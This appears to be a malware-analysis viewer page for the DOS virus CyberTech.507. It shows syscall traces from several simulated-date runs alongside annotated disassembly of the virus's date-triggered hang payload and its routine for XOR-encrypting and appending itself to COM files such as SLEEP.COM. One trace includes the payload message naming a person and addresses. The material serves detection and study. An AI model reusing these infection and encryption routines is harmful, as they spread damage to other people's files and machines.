Sample viewer

vx.netlux.org/Virus.DOS.CyberTech.507.c


Syscalls:

Time Syscall Op Syscall Name
; Disassembly window the viewer attaches to the "Get date" row: 20 instructions listed
; linearly from the address after the INT 21h (the PC column), not the path actually executed.
; DOS Get date (AH=2Ah) returns DH = month, DL = day of month, AL = weekday (0 = Sunday).
; Date trigger: month >= 8 and day >= 22 and weekday == 3 (Wednesday) -> print a message and hang.
; Otherwise month >= 5 continues to the file search, and earlier months jump to 0x12b47.
; In this run the rows that follow show the file search, an open and two writes, so the
; search branch was the one taken.
; NOTE(review): bp presumably holds the code's own load offset; that setup is not shown here.
2018-12-17T22:19:46.558557694Z 42 PC: 12a73 | Get date 0x12a73: cmp dh, 8
0x12a76: jb 0x12a8c    ; month (DH) below 8: skip the payload
0x12a78: cmp dl, 0x16
0x12a7b: jb 0x12a8c    ; day (DL) below 22: skip the payload
0x12a7d: cmp al, 3
0x12a7f: jne 0x12a8c    ; weekday (AL) is not 3 = Wednesday: skip the payload
0x12a81: mov ah, 9    ; DOS print-string function
0x12a83: lea dx, word ptr [bp + 0x135]    ; message text at bp+0x135
0x12a87: int 0x21
0x12a89: cli    ; mask interrupts, then
0x12a8a: jmp 0x12a89    ; spin on this address: the machine stays hung until reset
0x12a8c: cmp dh, 5
0x12a8f: jae 0x12a94    ; May or later: go on to the file search
0x12a91: jmp 0x12b47    ; January to April: leave, target is outside this window
0x12a94: mov ah, 0x1a    ; DOS set-DTA function
0x12a96: mov dx, 0xfc00    ; DTA placed at DS:0xfc00
0x12a99: int 0x21
0x12a9b: mov ah, 0x4e    ; DOS find-first function
0x12a9d: lea dx, word ptr [bp + 0x12f]    ; search pattern at bp+0x12f (its text is not shown)
0x12aa1: xor cx, cx    ; attribute mask 0; the INT 21h itself falls past the window
2018-12-17T22:19:46.561138175Z 26 PC: 12a9b | Set disk transfer address
2018-12-17T22:19:46.562183057Z 78 PC: 12aa5 | Find first file
2018-12-17T22:19:46.567867284Z 67 PC: 12ab2 | Get or set file attributes
2018-12-17T22:19:46.573568955Z 67 PC: 12aba | Get or set file attributes
2018-12-17T22:19:46.589691226Z 61 PC: 12abf | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:19:46.593887557Z 87 PC: 12ac5 | Get or set file date and time
2018-12-17T22:19:46.595147204Z 63 PC: 12ad2 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:19:46.599469725Z 66 PC: 12af8 | Move file pointer
; Disassembly window the viewer attaches to the "Get time" row: 20 instructions listed
; linearly from the address after the INT 21h (the PC column).
; DOS Get time (AH=2Ch) returns DL = hundredths of a second; DL is used here as a one-byte XOR key.
; The code stages a 0x1fb-byte (507) image at ES:0xfd00: 0x18 bytes copied as-is, then
; 0x1e3 bytes XORed with the key, and writes it to the open file.
; Detection note: the 0x18-byte prefix is written unencoded, and the only prefix byte this
; window changes is the key stored at bp+0x18 (offset 0x14 of the image), so the prefix is a
; candidate signature anchor. NOTE(review): other prefix bytes may be patched elsewhere - confirm.
2018-12-17T22:19:46.600592415Z 44 PC: 12b0b | Get time 0x12b0b: mov byte ptr cs:[bp + 0x18], dl
0x12b10: lea si, word ptr [bp + 4]    ; source: prefix starting at bp+4
0x12b14: mov di, 0xfd00    ; destination: staging buffer at ES:0xfd00
0x12b17: mov cx, 0x18    ; 0x18 (24) prefix bytes
0x12b1a: rep movsb byte ptr es:[di], byte ptr [si]    ; copied unmodified; the range covers the key byte at bp+0x18
0x12b1c: lea si, word ptr [bp + 0x1c]    ; source: remainder starting at bp+0x1c
0x12b20: mov cx, 0x1e3    ; 0x1e3 (483) bytes to encode
0x12b23: lodsb al, byte ptr [si]
0x12b24: xor al, dl    ; single-byte XOR with the key
0x12b26: stosb byte ptr es:[di], al
0x12b27: loop 0x12b23
0x12b29: mov ah, 0x40    ; DOS write function
0x12b2b: mov dx, 0xfd00    ; data comes from the staging buffer
0x12b2e: mov cx, 0x1fb    ; 0x18 + 0x1e3 = 0x1fb = 507 bytes, as in the "Write 507 bytes" row
0x12b31: int 0x21
0x12b33: mov ax, 0x4200    ; DOS seek function, origin = start of file
0x12b36: call 0x22af2    ; callee not shown; the "Move file pointer" row at PC 12af8 presumably comes from it, and the 0x2xxxx target looks like a 16-bit wrap artefact of the listing - TODO confirm
0x12b39: mov ah, 0x40    ; DOS write function again
0x12b3b: lea dx, word ptr [bp + 0x12c]    ; 4-byte source at bp+0x12c
0x12b3f: mov cx, 4    ; 4 bytes; the INT 21h falls past the window (trace row at PC 12b44)
2018-12-17T22:19:46.602173885Z 64 PC: 12b33 | Write file or device (Write 507 bytes on handle 5)
2018-12-17T22:19:46.607604834Z 66 PC: 12af8 | Move file pointer
2018-12-17T22:19:46.608600436Z 64 PC: 12b44 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:19:46.612682234Z 87 PC: 12b5d | Get or set file date and time
2018-12-17T22:19:46.614397371Z 62 PC: 12b61 | Close file
2018-12-17T22:19:46.619717793Z 67 PC: 12b6a | Get or set file attributes
2018-12-17T22:19:46.632181994Z 26 PC: 12b4e | Set disk transfer address

{"DateBased":true,"Day":22,"Month":8,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3412,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
; Disassembly window the viewer attaches to the "Get date" row: 20 instructions listed
; linearly from the address after the INT 21h (the PC column), not the path actually executed.
; DOS Get date (AH=2Ah) returns DH = month, DL = day of month, AL = weekday (0 = Sunday).
; Date trigger: month >= 8 and day >= 22 and weekday == 3 (Wednesday) -> print a message and hang.
; Otherwise month >= 5 continues to the file search, and earlier months jump to 0x12b47.
; In this run the rows that follow show the file search, an open and two writes, so the
; search branch was taken. The date record printed above this run (22 Aug 1980, a Friday)
; would pass the month and day tests but fail the weekday test - presumably it is this
; run's simulated clock; the page does not label it.
; NOTE(review): bp presumably holds the code's own load offset; that setup is not shown here.
2018-12-25T11:49:00.328981245Z 42 PC: 12a73 | Get date 0x12a73: cmp dh, 8
0x12a76: jb 0x12a8c    ; month (DH) below 8: skip the payload
0x12a78: cmp dl, 0x16
0x12a7b: jb 0x12a8c    ; day (DL) below 22: skip the payload
0x12a7d: cmp al, 3
0x12a7f: jne 0x12a8c    ; weekday (AL) is not 3 = Wednesday: skip the payload
0x12a81: mov ah, 9    ; DOS print-string function
0x12a83: lea dx, word ptr [bp + 0x135]    ; message text at bp+0x135
0x12a87: int 0x21
0x12a89: cli    ; mask interrupts, then
0x12a8a: jmp 0x12a89    ; spin on this address: the machine stays hung until reset
0x12a8c: cmp dh, 5
0x12a8f: jae 0x12a94    ; May or later: go on to the file search
0x12a91: jmp 0x12b47    ; January to April: leave, target is outside this window
0x12a94: mov ah, 0x1a    ; DOS set-DTA function
0x12a96: mov dx, 0xfc00    ; DTA placed at DS:0xfc00
0x12a99: int 0x21
0x12a9b: mov ah, 0x4e    ; DOS find-first function
0x12a9d: lea dx, word ptr [bp + 0x12f]    ; search pattern at bp+0x12f (its text is not shown)
0x12aa1: xor cx, cx    ; attribute mask 0; the INT 21h itself falls past the window
2018-12-25T11:49:00.331909429Z 26 PC: 12a9b | Set disk transfer address
2018-12-25T11:49:00.333711283Z 78 PC: 12aa5 | Find first file
2018-12-25T11:49:00.341421675Z 67 PC: 12ab2 | Get or set file attributes
2018-12-25T11:49:00.348734055Z 67 PC: 12aba | Get or set file attributes
2018-12-25T11:49:01.515658207Z 61 PC: 12abf | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:49:01.523695273Z 87 PC: 12ac5 | Get or set file date and time
2018-12-25T11:49:01.525269631Z 63 PC: 12ad2 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:49:01.532317494Z 66 PC: 12af8 | Move file pointer
; Disassembly window the viewer attaches to the "Get time" row: 20 instructions listed
; linearly from the address after the INT 21h (the PC column).
; DOS Get time (AH=2Ch) returns DL = hundredths of a second; DL is used here as a one-byte XOR key.
; The code stages a 0x1fb-byte (507) image at ES:0xfd00: 0x18 bytes copied as-is, then
; 0x1e3 bytes XORed with the key, and writes it to the open file.
; Detection note: the 0x18-byte prefix is written unencoded, and the only prefix byte this
; window changes is the key stored at bp+0x18 (offset 0x14 of the image), so the prefix is a
; candidate signature anchor. NOTE(review): other prefix bytes may be patched elsewhere - confirm.
2018-12-25T11:49:01.534199853Z 44 PC: 12b0b | Get time 0x12b0b: mov byte ptr cs:[bp + 0x18], dl
0x12b10: lea si, word ptr [bp + 4]    ; source: prefix starting at bp+4
0x12b14: mov di, 0xfd00    ; destination: staging buffer at ES:0xfd00
0x12b17: mov cx, 0x18    ; 0x18 (24) prefix bytes
0x12b1a: rep movsb byte ptr es:[di], byte ptr [si]    ; copied unmodified; the range covers the key byte at bp+0x18
0x12b1c: lea si, word ptr [bp + 0x1c]    ; source: remainder starting at bp+0x1c
0x12b20: mov cx, 0x1e3    ; 0x1e3 (483) bytes to encode
0x12b23: lodsb al, byte ptr [si]
0x12b24: xor al, dl    ; single-byte XOR with the key
0x12b26: stosb byte ptr es:[di], al
0x12b27: loop 0x12b23
0x12b29: mov ah, 0x40    ; DOS write function
0x12b2b: mov dx, 0xfd00    ; data comes from the staging buffer
0x12b2e: mov cx, 0x1fb    ; 0x18 + 0x1e3 = 0x1fb = 507 bytes, as in the "Write 507 bytes" row
0x12b31: int 0x21
0x12b33: mov ax, 0x4200    ; DOS seek function, origin = start of file
0x12b36: call 0x22af2    ; callee not shown; the "Move file pointer" row at PC 12af8 presumably comes from it, and the 0x2xxxx target looks like a 16-bit wrap artefact of the listing - TODO confirm
0x12b39: mov ah, 0x40    ; DOS write function again
0x12b3b: lea dx, word ptr [bp + 0x12c]    ; 4-byte source at bp+0x12c
0x12b3f: mov cx, 4    ; 4 bytes; the INT 21h falls past the window (trace row at PC 12b44)
2018-12-25T11:49:01.536536227Z 64 PC: 12b33 | Write file or device (Write 507 bytes on handle 5)
2018-12-25T11:49:01.545161176Z 66 PC: 12af8 | Move file pointer (See above)
2018-12-25T11:49:01.54676955Z 64 PC: 12b44 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:49:01.553907784Z 87 PC: 12b5d | Get or set file date and time
2018-12-25T11:49:01.55526328Z 62 PC: 12b61 | Close file
2018-12-25T11:49:01.563973269Z 67 PC: 12b6a | Get or set file attributes
2018-12-25T11:49:01.575291783Z 26 PC: 12b4e | Set disk transfer address

{"DateBased":true,"Day":27,"Month":8,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3412,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
; Disassembly window the viewer attaches to the "Get date" row: 20 instructions listed
; linearly from the address after the INT 21h (the PC column), not the path actually executed.
; DOS Get date (AH=2Ah) returns DH = month, DL = day of month, AL = weekday (0 = Sunday).
; Date trigger: month >= 8 and day >= 22 and weekday == 3 (Wednesday) -> print a message and hang.
; Otherwise month >= 5 continues to the file search, and earlier months jump to 0x12b47.
; In this run the only row that follows is "Display string" at PC 12a89, so the payload
; branch was taken and the trace ends in the cli/jmp loop. The date record printed above
; this run (27 Aug 1980, a Wednesday) satisfies all three tests - presumably it is this
; run's simulated clock; the page does not label it.
; NOTE(review): bp presumably holds the code's own load offset; that setup is not shown here.
2018-12-25T11:49:00.419848411Z 42 PC: 12a73 | Get date 0x12a73: cmp dh, 8
0x12a76: jb 0x12a8c    ; month (DH) below 8: skip the payload
0x12a78: cmp dl, 0x16
0x12a7b: jb 0x12a8c    ; day (DL) below 22: skip the payload
0x12a7d: cmp al, 3
0x12a7f: jne 0x12a8c    ; weekday (AL) is not 3 = Wednesday: skip the payload
0x12a81: mov ah, 9    ; DOS print-string function
0x12a83: lea dx, word ptr [bp + 0x135]    ; message text at bp+0x135
0x12a87: int 0x21
0x12a89: cli    ; mask interrupts, then
0x12a8a: jmp 0x12a89    ; spin on this address: the machine stays hung until reset
0x12a8c: cmp dh, 5
0x12a8f: jae 0x12a94    ; May or later: go on to the file search
0x12a91: jmp 0x12b47    ; January to April: leave, target is outside this window
0x12a94: mov ah, 0x1a    ; DOS set-DTA function
0x12a96: mov dx, 0xfc00    ; DTA placed at DS:0xfc00
0x12a99: int 0x21
0x12a9b: mov ah, 0x4e    ; DOS find-first function
0x12a9d: lea dx, word ptr [bp + 0x12f]    ; search pattern at bp+0x12f (its text is not shown)
0x12aa1: xor cx, cx    ; attribute mask 0; the INT 21h itself falls past the window
2018-12-25T11:49:00.42193974Z 9 PC: 12a89 | Display string (String= ' RTL4 Joop van den Ende Produkties BV Marco Daas (Casting Assistent) Postbus 397 1430 AJ AALSMEER van Cleeffkade 15 1413 BA AALSMEER The Netherlands Wedden dat... je een virus hebt? ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3412,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
; Disassembly window the viewer attaches to the "Get date" row: 20 instructions listed
; linearly from the address after the INT 21h (the PC column), not the path actually executed.
; DOS Get date (AH=2Ah) returns DH = month, DL = day of month, AL = weekday (0 = Sunday).
; Date trigger: month >= 8 and day >= 22 and weekday == 3 (Wednesday) -> print a message and hang.
; Otherwise month >= 5 continues to the file search, and earlier months jump to 0x12b47.
; In this run the only row that follows is "Set disk transfer address" at PC 12b4e with no
; file search, which fits the early exit through 0x12b47. The date record printed above this
; run (1 Jan 1980) has month < 5 - presumably it is this run's simulated clock; the page
; does not label it.
; NOTE(review): bp presumably holds the code's own load offset; that setup is not shown here.
2018-12-25T11:49:00.530753822Z 42 PC: 12a73 | Get date 0x12a73: cmp dh, 8
0x12a76: jb 0x12a8c    ; month (DH) below 8: skip the payload
0x12a78: cmp dl, 0x16
0x12a7b: jb 0x12a8c    ; day (DL) below 22: skip the payload
0x12a7d: cmp al, 3
0x12a7f: jne 0x12a8c    ; weekday (AL) is not 3 = Wednesday: skip the payload
0x12a81: mov ah, 9    ; DOS print-string function
0x12a83: lea dx, word ptr [bp + 0x135]    ; message text at bp+0x135
0x12a87: int 0x21
0x12a89: cli    ; mask interrupts, then
0x12a8a: jmp 0x12a89    ; spin on this address: the machine stays hung until reset
0x12a8c: cmp dh, 5
0x12a8f: jae 0x12a94    ; May or later: go on to the file search
0x12a91: jmp 0x12b47    ; January to April: leave, target is outside this window
0x12a94: mov ah, 0x1a    ; DOS set-DTA function
0x12a96: mov dx, 0xfc00    ; DTA placed at DS:0xfc00
0x12a99: int 0x21
0x12a9b: mov ah, 0x4e    ; DOS find-first function
0x12a9d: lea dx, word ptr [bp + 0x12f]    ; search pattern at bp+0x12f (its text is not shown)
0x12aa1: xor cx, cx    ; attribute mask 0; the INT 21h itself falls past the window
2018-12-25T11:49:00.533375252Z 26 PC: 12b4e | Set disk transfer address

{"DateBased":true,"Day":1,"Month":6,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3412,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
; Disassembly window the viewer attaches to the "Get date" row: 20 instructions listed
; linearly from the address after the INT 21h (the PC column), not the path actually executed.
; DOS Get date (AH=2Ah) returns DH = month, DL = day of month, AL = weekday (0 = Sunday).
; Date trigger: month >= 8 and day >= 22 and weekday == 3 (Wednesday) -> print a message and hang.
; Otherwise month >= 5 continues to the file search, and earlier months jump to 0x12b47.
; In this run the rows that follow show the file search, an open and two writes, so the
; search branch was taken. The date record printed above this run (1 Jun 1980) has
; month >= 5 but < 8 - presumably it is this run's simulated clock; the page does not label it.
; NOTE(review): bp presumably holds the code's own load offset; that setup is not shown here.
2018-12-25T11:49:00.934847234Z 42 PC: 12a73 | Get date 0x12a73: cmp dh, 8
0x12a76: jb 0x12a8c    ; month (DH) below 8: skip the payload
0x12a78: cmp dl, 0x16
0x12a7b: jb 0x12a8c    ; day (DL) below 22: skip the payload
0x12a7d: cmp al, 3
0x12a7f: jne 0x12a8c    ; weekday (AL) is not 3 = Wednesday: skip the payload
0x12a81: mov ah, 9    ; DOS print-string function
0x12a83: lea dx, word ptr [bp + 0x135]    ; message text at bp+0x135
0x12a87: int 0x21
0x12a89: cli    ; mask interrupts, then
0x12a8a: jmp 0x12a89    ; spin on this address: the machine stays hung until reset
0x12a8c: cmp dh, 5
0x12a8f: jae 0x12a94    ; May or later: go on to the file search
0x12a91: jmp 0x12b47    ; January to April: leave, target is outside this window
0x12a94: mov ah, 0x1a    ; DOS set-DTA function
0x12a96: mov dx, 0xfc00    ; DTA placed at DS:0xfc00
0x12a99: int 0x21
0x12a9b: mov ah, 0x4e    ; DOS find-first function
0x12a9d: lea dx, word ptr [bp + 0x12f]    ; search pattern at bp+0x12f (its text is not shown)
0x12aa1: xor cx, cx    ; attribute mask 0; the INT 21h itself falls past the window
2018-12-25T11:49:00.937651295Z 26 PC: 12a9b | Set disk transfer address
2018-12-25T11:49:00.938615115Z 78 PC: 12aa5 | Find first file
2018-12-25T11:49:00.945099394Z 67 PC: 12ab2 | Get or set file attributes
2018-12-25T11:49:00.952220487Z 67 PC: 12aba | Get or set file attributes
2018-12-25T11:49:00.967860463Z 61 PC: 12abf | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:49:00.975014814Z 87 PC: 12ac5 | Get or set file date and time
2018-12-25T11:49:00.984107676Z 63 PC: 12ad2 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:49:00.991386117Z 66 PC: 12af8 | Move file pointer
; Disassembly window the viewer attaches to the "Get time" row: 20 instructions listed
; linearly from the address after the INT 21h (the PC column).
; DOS Get time (AH=2Ch) returns DL = hundredths of a second; DL is used here as a one-byte XOR key.
; The code stages a 0x1fb-byte (507) image at ES:0xfd00: 0x18 bytes copied as-is, then
; 0x1e3 bytes XORed with the key, and writes it to the open file.
; Detection note: the 0x18-byte prefix is written unencoded, and the only prefix byte this
; window changes is the key stored at bp+0x18 (offset 0x14 of the image), so the prefix is a
; candidate signature anchor. NOTE(review): other prefix bytes may be patched elsewhere - confirm.
2018-12-25T11:49:00.993162066Z 44 PC: 12b0b | Get time 0x12b0b: mov byte ptr cs:[bp + 0x18], dl
0x12b10: lea si, word ptr [bp + 4]    ; source: prefix starting at bp+4
0x12b14: mov di, 0xfd00    ; destination: staging buffer at ES:0xfd00
0x12b17: mov cx, 0x18    ; 0x18 (24) prefix bytes
0x12b1a: rep movsb byte ptr es:[di], byte ptr [si]    ; copied unmodified; the range covers the key byte at bp+0x18
0x12b1c: lea si, word ptr [bp + 0x1c]    ; source: remainder starting at bp+0x1c
0x12b20: mov cx, 0x1e3    ; 0x1e3 (483) bytes to encode
0x12b23: lodsb al, byte ptr [si]
0x12b24: xor al, dl    ; single-byte XOR with the key
0x12b26: stosb byte ptr es:[di], al
0x12b27: loop 0x12b23
0x12b29: mov ah, 0x40    ; DOS write function
0x12b2b: mov dx, 0xfd00    ; data comes from the staging buffer
0x12b2e: mov cx, 0x1fb    ; 0x18 + 0x1e3 = 0x1fb = 507 bytes, as in the "Write 507 bytes" row
0x12b31: int 0x21
0x12b33: mov ax, 0x4200    ; DOS seek function, origin = start of file
0x12b36: call 0x22af2    ; callee not shown; the "Move file pointer" row at PC 12af8 presumably comes from it, and the 0x2xxxx target looks like a 16-bit wrap artefact of the listing - TODO confirm
0x12b39: mov ah, 0x40    ; DOS write function again
0x12b3b: lea dx, word ptr [bp + 0x12c]    ; 4-byte source at bp+0x12c
0x12b3f: mov cx, 4    ; 4 bytes; the INT 21h falls past the window (trace row at PC 12b44)
2018-12-25T11:49:00.995636713Z 64 PC: 12b33 | Write file or device (Write 507 bytes on handle 5)
2018-12-25T11:49:01.004118866Z 66 PC: 12af8 | Move file pointer (See above)
2018-12-25T11:49:01.005372833Z 64 PC: 12b44 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:49:01.011992032Z 87 PC: 12b5d | Get or set file date and time
2018-12-25T11:49:01.013699484Z 62 PC: 12b61 | Close file
2018-12-25T11:49:01.021238828Z 67 PC: 12b6a | Get or set file attributes
2018-12-25T11:49:01.031182063Z 26 PC: 12b4e | Set disk transfer address

{"DateBased":true,"Day":1,"Month":8,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":3412,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
; Disassembly window the viewer attaches to the "Get date" row: 20 instructions listed
; linearly from the address after the INT 21h (the PC column), not the path actually executed.
; DOS Get date (AH=2Ah) returns DH = month, DL = day of month, AL = weekday (0 = Sunday).
; Date trigger: month >= 8 and day >= 22 and weekday == 3 (Wednesday) -> print a message and hang.
; Otherwise month >= 5 continues to the file search, and earlier months jump to 0x12b47.
; In this run the rows that follow show the file search, an open and two writes, so the
; search branch was taken. The date record printed above this run (1 Aug 1980) passes the
; month test but fails the day test - presumably it is this run's simulated clock; the page
; does not label it.
; NOTE(review): bp presumably holds the code's own load offset; that setup is not shown here.
2018-12-25T11:49:01.741311159Z 42 PC: 12a73 | Get date 0x12a73: cmp dh, 8
0x12a76: jb 0x12a8c    ; month (DH) below 8: skip the payload
0x12a78: cmp dl, 0x16
0x12a7b: jb 0x12a8c    ; day (DL) below 22: skip the payload
0x12a7d: cmp al, 3
0x12a7f: jne 0x12a8c    ; weekday (AL) is not 3 = Wednesday: skip the payload
0x12a81: mov ah, 9    ; DOS print-string function
0x12a83: lea dx, word ptr [bp + 0x135]    ; message text at bp+0x135
0x12a87: int 0x21
0x12a89: cli    ; mask interrupts, then
0x12a8a: jmp 0x12a89    ; spin on this address: the machine stays hung until reset
0x12a8c: cmp dh, 5
0x12a8f: jae 0x12a94    ; May or later: go on to the file search
0x12a91: jmp 0x12b47    ; January to April: leave, target is outside this window
0x12a94: mov ah, 0x1a    ; DOS set-DTA function
0x12a96: mov dx, 0xfc00    ; DTA placed at DS:0xfc00
0x12a99: int 0x21
0x12a9b: mov ah, 0x4e    ; DOS find-first function
0x12a9d: lea dx, word ptr [bp + 0x12f]    ; search pattern at bp+0x12f (its text is not shown)
0x12aa1: xor cx, cx    ; attribute mask 0; the INT 21h itself falls past the window
2018-12-25T11:49:01.743857399Z 26 PC: 12a9b | Set disk transfer address
2018-12-25T11:49:01.744808473Z 78 PC: 12aa5 | Find first file
2018-12-25T11:49:01.750646258Z 67 PC: 12ab2 | Get or set file attributes
2018-12-25T11:49:01.756571137Z 67 PC: 12aba | Get or set file attributes
2018-12-25T11:49:01.772600645Z 61 PC: 12abf | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:49:01.779058123Z 87 PC: 12ac5 | Get or set file date and time
2018-12-25T11:49:01.780762309Z 63 PC: 12ad2 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:49:01.786799836Z 66 PC: 12af8 | Move file pointer
; Disassembly window the viewer attaches to the "Get time" row: 20 instructions listed
; linearly from the address after the INT 21h (the PC column).
; DOS Get time (AH=2Ch) returns DL = hundredths of a second; DL is used here as a one-byte XOR key.
; The code stages a 0x1fb-byte (507) image at ES:0xfd00: 0x18 bytes copied as-is, then
; 0x1e3 bytes XORed with the key, and writes it to the open file.
; Detection note: the 0x18-byte prefix is written unencoded, and the only prefix byte this
; window changes is the key stored at bp+0x18 (offset 0x14 of the image), so the prefix is a
; candidate signature anchor. NOTE(review): other prefix bytes may be patched elsewhere - confirm.
2018-12-25T11:49:01.788003727Z 44 PC: 12b0b | Get time 0x12b0b: mov byte ptr cs:[bp + 0x18], dl
0x12b10: lea si, word ptr [bp + 4]    ; source: prefix starting at bp+4
0x12b14: mov di, 0xfd00    ; destination: staging buffer at ES:0xfd00
0x12b17: mov cx, 0x18    ; 0x18 (24) prefix bytes
0x12b1a: rep movsb byte ptr es:[di], byte ptr [si]    ; copied unmodified; the range covers the key byte at bp+0x18
0x12b1c: lea si, word ptr [bp + 0x1c]    ; source: remainder starting at bp+0x1c
0x12b20: mov cx, 0x1e3    ; 0x1e3 (483) bytes to encode
0x12b23: lodsb al, byte ptr [si]
0x12b24: xor al, dl    ; single-byte XOR with the key
0x12b26: stosb byte ptr es:[di], al
0x12b27: loop 0x12b23
0x12b29: mov ah, 0x40    ; DOS write function
0x12b2b: mov dx, 0xfd00    ; data comes from the staging buffer
0x12b2e: mov cx, 0x1fb    ; 0x18 + 0x1e3 = 0x1fb = 507 bytes, as in the "Write 507 bytes" row
0x12b31: int 0x21
0x12b33: mov ax, 0x4200    ; DOS seek function, origin = start of file
0x12b36: call 0x22af2    ; callee not shown; the "Move file pointer" row at PC 12af8 presumably comes from it, and the 0x2xxxx target looks like a 16-bit wrap artefact of the listing - TODO confirm
0x12b39: mov ah, 0x40    ; DOS write function again
0x12b3b: lea dx, word ptr [bp + 0x12c]    ; 4-byte source at bp+0x12c
0x12b3f: mov cx, 4    ; 4 bytes; the INT 21h falls past the window (trace row at PC 12b44)
2018-12-25T11:49:01.790422763Z 64 PC: 12b33 | Write file or device (Write 507 bytes on handle 5)
2018-12-25T11:49:01.798294351Z 66 PC: 12af8 | Move file pointer (See above)
2018-12-25T11:49:01.799302912Z 64 PC: 12b44 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:49:01.80337281Z 87 PC: 12b5d | Get or set file date and time
2018-12-25T11:49:01.805011789Z 62 PC: 12b61 | Close file
2018-12-25T11:49:01.81223854Z 67 PC: 12b6a | Get or set file attributes
2018-12-25T11:49:01.821513987Z 26 PC: 12b4e | Set disk transfer address